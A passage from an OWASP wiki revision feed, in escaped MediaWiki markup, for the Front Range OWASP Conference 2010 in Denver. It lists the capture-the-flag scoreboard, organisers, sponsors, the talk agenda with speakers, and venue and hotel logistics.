 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{| border=&amp;quot;3&amp;quot;&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
|'''1'''||'''mantis'''||'''4500'''||&lt;br /&gt;
|-&lt;br /&gt;
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''&lt;br /&gt;
|-&lt;br /&gt;
|'''3'''||'''jgimer'''||'''2300'''||&lt;br /&gt;
|-&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84410</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84410"/>
				<updated>2010-06-03T21:35:13Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: Added scores&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
